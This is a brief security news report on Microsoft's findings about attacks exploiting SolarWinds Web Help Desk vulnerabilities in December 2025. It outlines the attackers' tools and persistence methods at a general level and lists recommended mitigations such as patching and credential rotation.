SolarWinds' Web Help Desk (WHD) is under attack, with cybercriminals exploiting vulnerabilities to steal high-privilege credentials. Microsoft researchers reported that these attacks occurred in December 2025, but they have yet to identify the specific flaw used. The intruders may have taken advantage of recently disclosed vulnerabilities like CVE-2025-40551 and CVE-2025-40536, or older ones like CVE-2025-26399. All these vulnerabilities involve critical security weaknesses that can allow unauthenticated attackers to execute commands remotely. Once attackers compromised WHD instances, they utilized PowerShell and the Background Intelligent Transfer Service (BITS) to download and execute malware. This method, known as “living off the land,” takes advantage of existing system tools, making detection harder. The intruders also installed Zoho ManageEngine, a legitimate remote management tool, to maintain access and control over the compromised systems. They enumerated sensitive user groups and established reverse SSH and RDP connections for persistence. In some cases, they created scheduled tasks to hide malicious activity within a virtualized environment and escalated their privileges to extract password data from domain controllers. Microsoft advises immediate action: patch WHD vulnerabilities, remove public access to administrative paths, and scan for unauthorized remote management tools. Rotating credentials for service and admin accounts reachable from WHD is also recommended, along with isolating any compromised hosts.